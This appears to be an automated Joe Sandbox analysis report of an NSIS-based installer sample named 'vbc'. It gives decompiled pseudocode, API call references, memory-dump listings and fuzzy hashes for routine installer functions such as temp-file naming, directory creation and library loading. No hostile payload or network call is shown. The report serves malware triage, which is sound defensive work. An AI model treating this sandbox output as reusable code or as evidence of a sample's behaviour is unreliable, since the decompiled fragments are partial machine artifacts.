                                                0x00401864
                                                0x00401865
                                                0x00401882
                                                0x00402c33
                                                0x00402c33
                                                0x00402c33
                                                0x00401867
                                                0x00401867
                                                0x00401868
                                                0x00401493
                                                0x0040239d
                                                0x0040239d
                                                0x0040239d
                                                0x00401865
                                                0x0040185e
                                                0x00402c35
                                                0x00402c39
                                                0x00402c39
                                                0x00401892
                                                0x00401897
                                                0x004018a5
                                                0x004018aa
                                                0x004018b0
                                                0x004018b4
                                                0x004018b6
                                                0x004018be
                                                0x004018ca
                                                0x004018b8
                                                0x004018b8
                                                0x004018bc
                                                0x00000000
                                                0x00000000
                                                0x004018bc
                                                0x004018d3
                                                0x004018d9
                                                0x004018db
                                                0x00000000
                                                0x004018e1
                                                0x004018e1
                                                0x004018e4
                                                0x004018fc
                                                0x004018e6
                                                0x004018e9
                                                0x004018f2
                                                0x004018f2
                                                0x00401901
                                                0x00401906
                                                0x00402398
                                                0x00000000
                                                0x00402398
                                                0x00000000

                                                APIs
                                                • lstrcatW.KERNEL32 ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32 ref: 004055FA
                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32 ref: 0040560C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nspDD94.tmp$C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll$Call
                                                • API String ID: 1941528284-1200728318
                                                • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 856 40559f-4055b4 857 4055ba-4055cb 856->857 858 40566b-40566f 856->858 859 4055d6-4055e2 lstrlenW 857->859 860 4055cd-4055d1 call 40657a 857->860 862 4055e4-4055f4 lstrlenW 859->862 863 4055ff-405603 859->863 860->859 862->858 866 4055f6-4055fa lstrcatW 862->866 864 405612-405616 863->864 865 405605-40560c SetWindowTextW 863->865 867 405618-40565a SendMessageW * 3 864->867 868 40565c-40565e 864->868 865->864 866->863 867->868 868->858 869 405660-405663 868->869 869->858
                                                C-Code - Quality: 100%
                                                			E0040559F(signed int _a4, WCHAR* _a8) {
                                                				struct HWND__* _v8;
                                                				signed int _v12;
                                                				WCHAR* _v32;
                                                				long _v44;
                                                				int _v48;
                                                				void* _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				WCHAR* _t27;
                                                				signed int _t28;
                                                				long _t29;
                                                				signed int _t37;
                                                				signed int _t38;
                                                
                                                				_t27 =  *0x433ee4;
                                                				_v8 = _t27;
                                                				if(_t27 != 0) {
                                                					_t37 =  *0x434fb4;
                                                					_v12 = _t37;
                                                					_t38 = _t37 & 0x00000001;
                                                					if(_t38 == 0) {
                                                						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                					}
                                                					_t27 = lstrlenW(0x42c248);
                                                					_a4 = _t27;
                                                					if(_a8 == 0) {
                                                						L6:
                                                						if((_v12 & 0x00000004) == 0) {
                                                							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
                                                						}
                                                						if((_v12 & 0x00000002) == 0) {
                                                							_v32 = 0x42c248;
                                                							_v52 = 1;
                                                							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                							_v44 = 0;
                                                							_v48 = _t29 - _t38;
                                                							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                						}
                                                						if(_t38 != 0) {
                                                							_t28 = _a4;
                                                							0x42c248[_t28] = 0;
                                                							return _t28;
                                                						}
                                                					} else {
                                                						_t27 = lstrlenW(_a8) + _a4;
                                                						if(_t27 < 0x1000) {
                                                							_t27 = lstrcatW(0x42c248, _a8);
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t27;
                                                			}

















                                                0x004055a5
                                                0x004055af
                                                0x004055b4
                                                0x004055ba
                                                0x004055c5
                                                0x004055c8
                                                0x004055cb
                                                0x004055d1
                                                0x004055d1
                                                0x004055d7
                                                0x004055df
                                                0x004055e2
                                                0x004055ff
                                                0x00405603
                                                0x0040560c
                                                0x0040560c
                                                0x00405616
                                                0x0040561f
                                                0x0040562b
                                                0x00405632
                                                0x00405636
                                                0x00405639
                                                0x0040564c
                                                0x0040565a
                                                0x0040565a
                                                0x0040565e
                                                0x00405660
                                                0x00405663
                                                0x00000000
                                                0x00405663
                                                0x004055e4
                                                0x004055ec
                                                0x004055f4
                                                0x004055fa
                                                0x00000000
                                                0x004055fa
                                                0x004055f4
                                                0x004055e2
                                                0x0040566f

                                                APIs
                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                • lstrcatW.KERNEL32 ref: 004055FA
                                                • SetWindowTextW.USER32 ref: 0040560C
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32 ref: 0040671F
                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,00000000), ref: 00406779
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll
                                                • API String ID: 1495540970-2508966711
                                                • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 870 40689a-4068ba GetSystemDirectoryW 871 4068bc 870->871 872 4068be-4068c0 870->872 871->872 873 4068d1-4068d3 872->873 874 4068c2-4068cb 872->874 876 4068d4-406907 wsprintfW LoadLibraryExW 873->876 874->873 875 4068cd-4068cf 874->875 875->876
                                                C-Code - Quality: 100%
                                                			E0040689A(intOrPtr _a4) {
                                                				short _v576;
                                                				signed int _t13;
                                                				struct HINSTANCE__* _t17;
                                                				signed int _t19;
                                                				void* _t24;
                                                
                                                				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                				if(_t13 > 0x104) {
                                                					_t13 = 0;
                                                				}
                                                				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                					_t19 = 1;
                                                				} else {
                                                					_t19 = 0;
                                                				}
                                                				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                				return _t17;
                                                			}








                                                0x004068b1
                                                0x004068ba
                                                0x004068bc
                                                0x004068bc
                                                0x004068c0
                                                0x004068d3
                                                0x004068cd
                                                0x004068cd
                                                0x004068cd
                                                0x004068ec
                                                0x00406900
                                                0x00406907

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                • wsprintfW.USER32 ref: 004068EC
                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 877 405a6e-405ab9 CreateDirectoryW 878 405abb-405abd 877->878 879 405abf-405acc GetLastError 877->879 880 405ae6-405ae8 878->880 879->880 881 405ace-405ae2 SetFileSecurityW 879->881 881->878 882 405ae4 GetLastError 881->882 882->880
                                                C-Code - Quality: 100%
                                                			E00405A6E(WCHAR* _a4) {
                                                				struct _SECURITY_ATTRIBUTES _v16;
                                                				struct _SECURITY_DESCRIPTOR _v36;
                                                				int _t22;
                                                				long _t23;
                                                
                                                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                				_v36.Owner = 0x4083f8;
                                                				_v36.Group = 0x4083f8;
                                                				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                				_v16.lpSecurityDescriptor =  &_v36;
                                                				_v36.Revision = 1;
                                                				_v36.Control = 4;
                                                				_v36.Dacl = 0x4083e8;
                                                				_v16.nLength = 0xc;
                                                				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                				if(_t22 != 0) {
                                                					L1:
                                                					return 0;
                                                				}
                                                				_t23 = GetLastError();
                                                				if(_t23 == 0xb7) {
                                                					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                						goto L1;
                                                					}
                                                					return GetLastError();
                                                				}
                                                				return _t23;
                                                			}







                                                0x00405a79
                                                0x00405a7d
                                                0x00405a80
                                                0x00405a86
                                                0x00405a8a
                                                0x00405a8e
                                                0x00405a96
                                                0x00405a9d
                                                0x00405aa3
                                                0x00405aaa
                                                0x00405ab1
                                                0x00405ab9
                                                0x00405abb
                                                0x00000000
                                                0x00405abb
                                                0x00405ac5
                                                0x00405acc
                                                0x00405ae2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405ae4
                                                0x00405ae8

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                • GetLastError.KERNEL32 ref: 00405AC5
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                • GetLastError.KERNEL32 ref: 00405AE4
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3449924974-4017390910
                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 883 73281817-73281856 call 73281bff 887 7328185c-73281860 883->887 888 73281976-73281978 883->888 889 73281869-73281876 call 73282480 887->889 890 73281862-73281868 call 7328243e 887->890 895 73281878-7328187d 889->895 896 732818a6-732818ad 889->896 890->889 899 73281898-7328189b 895->899 900 7328187f-73281880 895->900 897 732818cd-732818d1 896->897 898 732818af-732818cb call 73282655 call 73281654 call 73281312 GlobalFree 896->898 905 7328191e-73281924 call 73282655 897->905 906 732818d3-7328191c call 73281666 call 73282655 897->906 922 73281925-73281929 898->922 899->896 901 7328189d-7328189e call 73282e23 899->901 903 73281888-73281889 call 73282b98 900->903 904 73281882-73281883 900->904 914 732818a3 901->914 917 7328188e 903->917 910 73281890-73281896 call 73282810 904->910 911 73281885-73281886 904->911 905->922 906->922 921 732818a5 910->921 911->896 911->903 914->921 917->914 921->896 926 7328192b-73281939 call 73282618 922->926 927 73281966-7328196d 922->927 933 7328193b-7328193e 926->933 934 73281951-73281958 926->934 927->888 929 7328196f-73281970 GlobalFree 927->929 929->888 933->934 935 73281940-73281948 933->935 934->927 936 7328195a-73281965 call 732815dd 934->936 935->934 937 7328194a-7328194b FreeLibrary 935->937 936->927 937->934
                                                C-Code - Quality: 88%
                                                			E73281817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                				void _v36;
                                                				char _v136;
                                                				struct HINSTANCE__* _t37;
                                                				intOrPtr _t42;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t50;
                                                				void* _t54;
                                                				intOrPtr _t57;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t72;
                                                				void* _t76;
                                                
                                                				_t76 = __esi;
                                                				_t68 = __edi;
                                                				_t67 = __edx;
                                                				 *0x7328506c = _a8;
                                                				 *0x73285070 = _a16;
                                                				 *0x73285074 = _a12;
                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x73285048, E73281651);
                                                				_push(1); // executed
                                                				_t37 = E73281BFF(); // executed
                                                				_t54 = _t37;
                                                				if(_t54 == 0) {
                                                					L28:
                                                					return _t37;
                                                				} else {
                                                					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                						E7328243E(_t54);
                                                					}
                                                					_push(_t54);
                                                					E73282480(_t67);
                                                					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                					if(_t57 == 0xffffffff) {
                                                						L14:
                                                						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                								_push(_t54);
                                                								_t37 = E73282655();
                                                							} else {
                                                								_push(_t76);
                                                								_push(_t68);
                                                								_t61 = 8;
                                                								_t13 = _t54 + 0x1018; // 0x1018
                                                								memcpy( &_v36, _t13, _t61 << 2);
                                                								_t42 = E73281666(_t54,  &_v136);
                                                								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                								_t18 = _t54 + 0x1018; // 0x1018
                                                								_t72 = _t18;
                                                								_push(_t54);
                                                								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                								 *_t72 = 4;
                                                								E73282655();
                                                								_t63 = 8;
                                                								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                							}
                                                						} else {
                                                							_push(_t54);
                                                							E73282655();
                                                							_t37 = GlobalFree(E73281312(E73281654(_t54)));
                                                						}
                                                						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                							_t37 = E73282618(_t54);
                                                							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                								_t37 =  *(_t54 + 0x1008);
                                                								if(_t37 != 0) {
                                                									_t37 = FreeLibrary(_t37);
                                                								}
                                                							}
                                                							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                								_t37 = E732815DD( *0x73285068);
                                                							}
                                                						}
                                                						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                							goto L28;
                                                						} else {
                                                							return GlobalFree(_t54);
                                                						}
                                                					}
                                                					_t48 =  *_t54;
                                                					if(_t48 == 0) {
                                                						if(_t57 != 1) {
                                                							goto L14;
                                                						}
                                                						E73282E23(_t54);
                                                						L12:
                                                						_t54 = _t48;
                                                						L13:
                                                						goto L14;
                                                					}
                                                					_t49 = _t48 - 1;
                                                					if(_t49 == 0) {
                                                						L8:
                                                						_t48 = E73282B98(_t57, _t54); // executed
                                                						goto L12;
                                                					}
                                                					_t50 = _t49 - 1;
                                                					if(_t50 == 0) {
                                                						E73282810(_t54);
                                                						goto L13;
                                                					}
                                                					if(_t50 != 1) {
                                                						goto L14;
                                                					}
                                                					goto L8;
                                                				}
                                                			}


















                                                0x73281817
                                                0x73281817
                                                0x73281817
                                                0x73281824
                                                0x7328182c
                                                0x73281839
                                                0x73281847
                                                0x7328184a
                                                0x7328184c
                                                0x73281851
                                                0x73281856
                                                0x73281978
                                                0x73281978
                                                0x7328185c
                                                0x73281860
                                                0x73281863
                                                0x73281868
                                                0x73281869
                                                0x7328186a
                                                0x73281870
                                                0x73281876
                                                0x732818a6
                                                0x732818ad
                                                0x732818d1
                                                0x7328191e
                                                0x7328191f
                                                0x732818d3
                                                0x732818d3
                                                0x732818d4
                                                0x732818dd
                                                0x732818de
                                                0x732818e8
                                                0x732818eb
                                                0x732818f0
                                                0x732818f7
                                                0x732818f7
                                                0x732818fd
                                                0x732818fe
                                                0x73281904
                                                0x7328190a
                                                0x73281917
                                                0x73281918
                                                0x7328191b
                                                0x732818af
                                                0x732818af
                                                0x732818b0
                                                0x732818c5
                                                0x732818c5
                                                0x73281929
                                                0x7328192c
                                                0x73281939
                                                0x73281940
                                                0x73281948
                                                0x7328194b
                                                0x7328194b
                                                0x73281948
                                                0x73281958
                                                0x73281960
                                                0x73281965
                                                0x73281958
                                                0x7328196d
                                                0x00000000
                                                0x7328196f
                                                0x00000000
                                                0x73281970
                                                0x7328196d
                                                0x7328187a
                                                0x7328187d
                                                0x7328189b
                                                0x00000000
                                                0x00000000
                                                0x7328189e
                                                0x732818a3
                                                0x732818a3
                                                0x732818a5
                                                0x00000000
                                                0x732818a5
                                                0x7328187f
                                                0x73281880
                                                0x73281888
                                                0x73281889
                                                0x00000000
                                                0x73281889
                                                0x73281882
                                                0x73281883
                                                0x73281891
                                                0x00000000
                                                0x73281891
                                                0x73281886
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281886

                                                APIs
                                                  • Part of subcall function 73281BFF: GlobalFree.KERNEL32(?), ref: 73281E74
                                                  • Part of subcall function 73281BFF: GlobalFree.KERNEL32(?), ref: 73281E79
                                                  • Part of subcall function 73281BFF: GlobalFree.KERNEL32(?), ref: 73281E7E
                                                • GlobalFree.KERNEL32(00000000), ref: 732818C5
                                                • FreeLibrary.KERNEL32(?), ref: 7328194B
                                                • GlobalFree.KERNEL32(00000000), ref: 73281970
                                                  • Part of subcall function 7328243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7328246F
                                                  • Part of subcall function 73282810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73281896,00000000), ref: 732828E0
                                                  • Part of subcall function 73281666: wsprintfW.USER32 ref: 73281694
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680334815.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000004.00000002.680330419.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680339813.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680344167.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                • String ID:
                                                • API String ID: 3962662361-3916222277
                                                • Opcode ID: 4606671b8831c3c661b6cbebacc9347888ea1b417c3e1c4865585c7f69f65894
                                                • Instruction ID: 50984e9d651121102e6edebaceb5b54fa93795519466b6b085e403dc143bfc0e
                                                • Opcode Fuzzy Hash: 4606671b8831c3c661b6cbebacc9347888ea1b417c3e1c4865585c7f69f65894
                                                • Instruction Fuzzy Hash: A941B6726003569BEB119F74E988BD537ACBF04314F188865E94B9E0C6DBB8E0C5C760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 940 40605c-406068 941 406069-40609d GetTickCount GetTempFileNameW 940->941 942 4060ac-4060ae 941->942 943 40609f-4060a1 941->943 945 4060a6-4060a9 942->945 943->941 944 4060a3 943->944 944->945
                                                C-Code - Quality: 100%
                                                			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                				intOrPtr _v8;
                                                				short _v12;
                                                				short _t12;
                                                				intOrPtr _t13;
                                                				signed int _t14;
                                                				WCHAR* _t17;
                                                				signed int _t19;
                                                				signed short _t23;
                                                				WCHAR* _t26;
                                                
                                                				_t26 = _a4;
                                                				_t23 = 0x64;
                                                				while(1) {
                                                					_t12 =  *L"nsa"; // 0x73006e
                                                					_t23 = _t23 - 1;
                                                					_v12 = _t12;
                                                					_t13 =  *0x40a57c; // 0x61
                                                					_v8 = _t13;
                                                					_t14 = GetTickCount();
                                                					_t19 = 0x1a;
                                                					_v8 = _v8 + _t14 % _t19;
                                                					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                					if(_t17 != 0) {
                                                						break;
                                                					}
                                                					if(_t23 != 0) {
                                                						continue;
                                                					} else {
                                                						 *_t26 =  *_t26 & _t23;
                                                					}
                                                					L4:
                                                					return _t17;
                                                				}
                                                				_t17 = _t26;
                                                				goto L4;
                                                			}












                                                0x00406062
                                                0x00406068
                                                0x00406069
                                                0x00406069
                                                0x0040606e
                                                0x0040606f
                                                0x00406072
                                                0x00406077
                                                0x0040607a
                                                0x00406084
                                                0x00406091
                                                0x00406095
                                                0x0040609d
                                                0x00000000
                                                0x00000000
                                                0x004060a1
                                                0x00000000
                                                0x004060a3
                                                0x004060a3
                                                0x004060a3
                                                0x004060a6
                                                0x004060a9
                                                0x004060a9
                                                0x004060ac
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32(74EDD4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040607A
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-4262883142
                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
